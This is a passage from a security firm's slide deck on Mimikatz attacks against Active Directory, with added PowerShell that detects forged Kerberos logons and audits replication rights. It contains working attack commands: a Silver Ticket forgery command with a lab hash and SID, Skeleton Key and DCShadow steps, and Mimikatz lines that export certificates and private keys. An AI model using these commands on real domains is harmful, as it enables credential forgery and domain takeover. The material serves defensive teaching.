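function Find-SuspiciousKerberosLogon {
    # $Events carries the TargetUserName / TargetUserSid / AuthenticationPackageName
    # fields of Security event 4624 (Get-WinEvent -FilterHashtable @{LogName='Security';Id=4624}).
    param([object[]]$Events)
    foreach ($e in $Events) {
        if ($e.AuthenticationPackageName -ne 'Kerberos') { continue }
        $owner  = Resolve-DomainAccount -Sid $e.TargetUserSid
        $reason = $null
        if (-not $owner) {
            $reason = 'SID does not resolve to a domain account'
        } elseif ($owner -ne $e.TargetUserName) {
            $reason = "name '$($e.TargetUserName)' does not match SID owner '$owner'"
        }
        if ($reason) {
            [pscustomobject]@{ Time = $e.TimeCreated; User = $e.TargetUserName
                               Sid  = $e.TargetUserSid; Reason = $reason }
        }
    }
}

# Constructed sample events: a normal logon, the slide's forged identity, and an NTLM logon.
$SampleEvents = @(
    [pscustomobject]@{ TimeCreated = '2018-08-31T10:00:00'; TargetUserName = 'user1'
                       TargetUserSid = "$DomainSid-1108"; AuthenticationPackageName = 'Kerberos' }
    [pscustomobject]@{ TimeCreated = '2018-08-31T10:05:00'; TargetUserName = 'doesnotexist'
                       TargetUserSid = "$DomainSid-9999"; AuthenticationPackageName = 'Kerberos' }
    [pscustomobject]@{ TimeCreated = '2018-08-31T10:07:00'; TargetUserName = 'Administrator'
                       TargetUserSid = "$DomainSid-500";  AuthenticationPackageName = 'NTLM' }
)
# Only the doesnotexist / RID 9999 logon is reported.
Find-SuspiciousKerberosLogon -Events $SampleEvents | Format-Table -AutoSize
```

This only catches forged tickets that name a non-existent identity; a ticket forged for a real account such as Administrator (RID 500) passes this check, which is why the KRBTGT password reset remains the mitigation and this is merely one detection.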
  • 31. Silver Ticket
    A Silver Ticket is a TGS (similar to a TGT in format) using the AD computer/service account (can be identified by SPN) NTLM password hash to encrypt and sign. Mimikatz adds the following groups to the ticket by default:
    • Domain Users SID: S-1-5-21<DOMAINID>-513
    • Domain Admins SID: S-1-5-21<DOMAINID>-512
    • Schema Admins SID: S-1-5-21<DOMAINID>-518
    • Enterprise Admins SID: S-1-5-21<DOMAINID>-519 (only effective when the forged ticket is created in the forest root domain; otherwise add it using the /sids parameter for AD forest admin rights)
    • Group Policy Creator Owners SID: S-1-5-21<DOMAINID>-520
    https://adsecurity.org/?page_id=1821
  • 32. Silver Ticket
    kerberos::golden /user:user1 /domain:sos.labs /id:1108 /sid:S-1-5-21-2872888145-3513486857-3924934394 /target:dc1.sos.labs /rc4:fbdcd5041c96ddbd82224270b57f11fc /server:http /ptt
    • /target - the host (SPN value); the sos.labs domain has dc1.sos.labs
    • /service - the name of the service that we will create tickets for (must be a service running as the service account)
    • /user - the user that the ticket will be created for; this can be any user account whatsoever, even user accounts that do not exist
    • /groups - list of groups to which the account in the ticket will belong; Domain Admins is included by default
    • /rc4 - NTLM hash of the account, or /aes128 /aes256 keys
  • 36. Skeleton Key
    • Inject the Skeleton Key into the LSASS process on a Domain Controller.
    • This enables all user authentication to the Skeleton Key patched DC to use a "master password" (mimikatz), aka the Skeleton Key, as well as the usual password.
    • A reboot removes the Skeleton Key injection.
  • 37. Security Identifiers (SID) module
  • 41. DCShadow
    Start the mimidrv service
    Elevate to SYSTEM
  • 43. DCShadow
    Running as SYSTEM
  • 44. DCShadow
    Running as Domain Admin
  • 46. DCShadow
    What can you do?
    • Add user to privileged groups such as Domain Admins, Enterprise Admins
    • Add SIDHistory
    • Change PrimaryGroupID
    • Etc.
  • 47. DCShadow
    The following permissions on AD objects are required:
    Domain object
    • DS-Install-Replica (Add/Remove Replica in Domain)
    • DS-Replication-Manage-Topology (Manage Replication Topology)
    • DS-Replication-Synchronize (Replication Synchronization)
    Sites object in the Configuration container
    • CreateChild and DeleteChild
    Computer object of the attacker's machine (which is registered as a fake DC)
    • WriteProperty
    Target object (user, computer or ADSPath)
    • WriteProperty
    https://github.com/samratashok/nishang/blob/master/ActiveDirectory/Set-DCShadowPermissions.ps1
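Both DCSync (slide 25) and DCShadow (slide 47) depend on replication-related rights on the domain object, plus CreateChild/DeleteChild on the Sites container for DCShadow, so the defender's first check is who actually holds them. As an added example, not from the presentation or the linked nishang script, the following PowerShell lists those ACEs. It assumes the RSAT ActiveDirectory module (which provides the AD: drive) and a domain-joined session with read access to the directory; the function name is mine, and the right GUIDs are resolved from the forest's own Extended-Rights container rather than hard-coded.

```powershell
# Added example, not from the presentation.
Import-Module ActiveDirectory

$rootDse  = Get-ADRootDSE
$domainDn = $rootDse.defaultNamingContext
$configDn = $rootDse.configurationNamingContext

# DS-Replication-Get-Changes-All is what DCSync needs; the other three are the
# domain-object rights listed on slide 47 for DCShadow.
$rightNames = 'DS-Install-Replica', 'DS-Replication-Manage-Topology',
              'DS-Replication-Synchronize', 'DS-Replication-Get-Changes-All'
$rightByGuid = @{}
foreach ($name in $rightNames) {
    $er = Get-ADObject -SearchBase "CN=Extended-Rights,$configDn" `
                       -LDAPFilter "(displayName=$name)" -Properties rightsGuid
    if ($er) { $rightByGuid[[guid]$er.rightsGuid] = $name }
}

function Get-ReplicationRightHolders {
    # Emits one record per Allow ACE on the object that grants one of the rights of
    # interest, an all-extended-rights ACE, GenericAll, or one of $GenericRights.
    param([string]$DistinguishedName, [string[]]$GenericRights = @())
    $extRight = [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight
    $acl = Get-Acl -Path "AD:\$DistinguishedName"
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $rights  = $ace.ActiveDirectoryRights
        $matched = $null
        if ($rights.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::GenericAll)) {
            $matched = 'GenericAll'
        } elseif ($rights.HasFlag($extRight) -and $rightByGuid.ContainsKey($ace.ObjectType)) {
            $matched = $rightByGuid[$ace.ObjectType]
        } elseif ($rights.HasFlag($extRight) -and $ace.ObjectType -eq [guid]::Empty) {
            $matched = 'All extended rights'
        } else {
            foreach ($g in $GenericRights) {
                if ($rights.HasFlag([System.DirectoryServices.ActiveDirectoryRights]$g)) { $matched = $g; break }
            }
        }
        if ($matched) {
            [pscustomobject]@{ Object = $DistinguishedName; Principal = $ace.IdentityReference
                               Right = $matched; Inherited = $ace.IsInherited }
        }
    }
}

# Domain object: expect Domain Controllers, Enterprise Domain Controllers, Administrators
# and Domain Admins, plus any documented directory-sync account; anything else is a finding.
Get-ReplicationRightHolders -DistinguishedName $domainDn | Sort-Object Principal | Format-Table -AutoSize
# Sites container: CreateChild/DeleteChild is what lets a principal register a fake site or server.
Get-ReplicationRightHolders -DistinguishedName "CN=Sites,$configDn" -GenericRights CreateChild, DeleteChild |
    Format-Table -AutoSize
```

Run it from a scheduled job and diff the output against the previous run: the interesting event is a new principal appearing, which is exactly what the linked Set-DCShadowPermissions.ps1 would produce.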
  • 51.
    mimikatz # privilege::debug
    Privilege '20' OK
    mimikatz # crypto::cng
    "KeyIso" service patched
    mimikatz # crypto::capi
    Local CryptoAPI patched
    mimikatz # crypto::certificates /export
     * System Store : 'CURRENT_USER' (0x00010000)
     * Store : 'My'
    mimikatz # crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
    mimikatz # crypto::keys /export
  • 56. System Environment Value module
  • 57. Token manipulation module
  • 58. Terminal Server module
  • 59. IIS XML Config module
  • 60. Data Protection API module
  • 61. Questions?
    Security, it's all we do. Knowledge, Experience & Trust.
  • 62. Thank You!
    © 2002 – 2018 Sense of Security Pty Limited. All rights reserved. Some images used under license from Shutterstock.com or with permission from respective trademark owners. No part of this publication may be reproduced, distributed, or transmitted in any form or by any means, including photocopying, recording, or other electronic or mechanical methods, without the prior written permission of the publisher.